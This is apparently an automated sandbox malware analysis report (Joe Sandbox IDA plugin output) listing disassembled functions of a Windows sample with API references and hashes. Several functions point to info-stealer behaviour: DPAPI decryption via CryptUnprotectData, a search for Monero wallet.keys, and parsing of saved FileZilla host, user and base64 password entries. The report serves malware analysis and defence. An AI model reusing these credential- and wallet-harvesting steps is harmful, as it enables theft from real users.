                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: b5b5dd5b0b3fe97adbfa5fc0eb830724f36b6e6392b5313b1ecffbb1f24ba6fc
                            • Instruction ID: 1f588666e0e7aa56844be5e551cbc3b63a1353ff86c9a833289ad805ac3e7c7d
                            • Opcode Fuzzy Hash: b5b5dd5b0b3fe97adbfa5fc0eb830724f36b6e6392b5313b1ecffbb1f24ba6fc
                            • Instruction Fuzzy Hash: C9118EB1945218EBEB248B54DC49FA9B7B8FB04721F1043AAE90A932C0C7745E40CF51
                            Function 00693720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.COMBASE(0069E118,00000000,00000001,0069E108,00000000), ref: 00693758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006937B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: 85351b00c6201bff14bd830b0ac1531ec71ba7a1086dc264ffdf3033490ea05e
                            • Instruction ID: 0f4ef3e6fc49777d548ae1741628951cd4b0fe33815c94a35db031d025648049
                            • Opcode Fuzzy Hash: 85351b00c6201bff14bd830b0ac1531ec71ba7a1086dc264ffdf3033490ea05e
                            • Instruction Fuzzy Hash: F441D670A40A28AFDB24DB58CC95B9BB7B9BB48702F5041D8A609E72D0D7716E85CF50
                            Function 00689B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00689B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00689BA3
                            • LocalFree.KERNEL32(?), ref: 00689BD3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 8ef156c0740839f5b970dbad34ec15cffd535b46524885d5177edfe48f23ed22
                            • Instruction ID: 7881f6d70de1a3ed84cd9b4b56519347bd8cbb494c47551e85891cb288dcdf39
                            • Opcode Fuzzy Hash: 8ef156c0740839f5b970dbad34ec15cffd535b46524885d5177edfe48f23ed22
                            • Instruction Fuzzy Hash: 4C11C9B8A00209EFDB04DF94D985EAEB7B5FF88304F1045A8E915A7350D774AE10CFA1
                            Function 00A43D59 Relevance: 3.4, Strings: 2, Instructions: 935COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: [W=$md}v
                            • API String ID: 0-3924545739
                            • Opcode ID: 659f45ad4dc986f69a964a4a33e6f746a99fc71e65d2ef343bbb962d8c1a542b
                            • Instruction ID: 07a70dd4982e152df41578a7e775763e91150592d23b770e8bf18aa355aaa6d9
                            • Opcode Fuzzy Hash: 659f45ad4dc986f69a964a4a33e6f746a99fc71e65d2ef343bbb962d8c1a542b
                            • Instruction Fuzzy Hash: 8A62E3F2A0C2009FD3046F19EC85A7EFBE5EF94720F16892DEAC487344E63598558B97
                            Function 0068F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A15B8,006A0D96), ref: 0068F71E
                            • StrCmpCA.SHLWAPI(?,006A15BC), ref: 0068F76F
                            • StrCmpCA.SHLWAPI(?,006A15C0), ref: 0068F785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068FAB1
                            • FindClose.KERNEL32(000000FF), ref: 0068FAC3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 4c9acf4c4317e9ed69ce14a9e85261229271d8b3c3750f53d88857ef31d90ce1
                            • Instruction ID: cb2b65b91dae71638e85ed443c20a2c87026f3552a70943215d060e938b87e7f
                            • Opcode Fuzzy Hash: 4c9acf4c4317e9ed69ce14a9e85261229271d8b3c3750f53d88857ef31d90ce1
                            • Instruction Fuzzy Hash: E811727181011D9BDF54FBE0DD569ED73BEAF11300F4042ADA51A56892EF302B4ACBD6
                            Function 00960861 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ;XD
                            • API String ID: 0-268549291
                            • Opcode ID: 65493e02e7e6de7d4a03a8781815c5a544fb10a153c8555e53ad56776341f95a
                            • Instruction ID: 6a20ccd79848a368a2ad2b525a7a2beafcf21e0c80cfb1fa39cefbed749fbfbb
                            • Opcode Fuzzy Hash: 65493e02e7e6de7d4a03a8781815c5a544fb10a153c8555e53ad56776341f95a
                            • Instruction Fuzzy Hash: A681A0B3E182109FE3486A2DD85573AFBE5EB84720F17893DE9D9D3384E9395C408786
                            Function 00A2D2FB Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: h[[
                            • API String ID: 0-3531621366
                            • Opcode ID: 5a0ea0c3ec9242d3b3e1ea53ed720d1f9efae8b043be22b0316397f1f393c5db
                            • Instruction ID: 3afa04f056061a66f28df79d02d190c40ab04d2ea44471bbe0ea1df416c669b9
                            • Opcode Fuzzy Hash: 5a0ea0c3ec9242d3b3e1ea53ed720d1f9efae8b043be22b0316397f1f393c5db
                            • Instruction Fuzzy Hash: 3641F6F3B052004BF308A93DDD9837AB6D79BD4311F2B853D9BC8977C4E93948094685
                            Function 009A5D3B Relevance: .2, Instructions: 183COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 70604ab87dbc94d10163b2888f4bc5cbae4b240808da61091e5f457023cdd6c4
                            • Instruction ID: 0a1253e6ced8a3550573900b32d8c377e1d0e70e9d369fd8b56f4c671ed62bb1
                            • Opcode Fuzzy Hash: 70604ab87dbc94d10163b2888f4bc5cbae4b240808da61091e5f457023cdd6c4
                            • Instruction Fuzzy Hash: 235158F3F082041BF348AA6AED9577AB6D6EBC4310F1A853DD785C7784F87958068286
                            Function 00A0BF1D Relevance: .2, Instructions: 180COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7f18f5a70146344600a7bca39148ba1bcd1c6d9816e3d7fe48a5f7b51eb2110a
                            • Instruction ID: 29bdc5917c3e33dc039c0eeb12bb2aea0610e8b7ab7175fba6edc8e1ae682cf1
                            • Opcode Fuzzy Hash: 7f18f5a70146344600a7bca39148ba1bcd1c6d9816e3d7fe48a5f7b51eb2110a
                            • Instruction Fuzzy Hash: E85139F3D182284BE3046A7CDC84767BAD4DB54360F16463DDE88E3380E93A5D0442C5
                            Function 00ABBEA7 Relevance: .1, Instructions: 131COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ba48ca243265ce0118075fe6838f50b70ff1a6b605bb9dbbc4b9cac534daa8d3
                            • Instruction ID: 0c0ca3365f008acf086a3a9a69fa028db989c3b4ec1a4533b3dc95fcf98ef0d2
                            • Opcode Fuzzy Hash: ba48ca243265ce0118075fe6838f50b70ff1a6b605bb9dbbc4b9cac534daa8d3
                            • Instruction Fuzzy Hash: B241D2B250C708DFE310BF1ADC856BAFBE8EF98710F15492DE6C582700EB7559458A17
                            Function 00699750 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            Function 00690250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                              • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                              • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                              • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                              • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                              • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                              • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,006A0DBA,006A0DB7,006A0DB6,006A0DB3), ref: 00690362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00690369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00690385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 006903CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 006903DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00690419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00690463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 0069051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 0069054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00690562
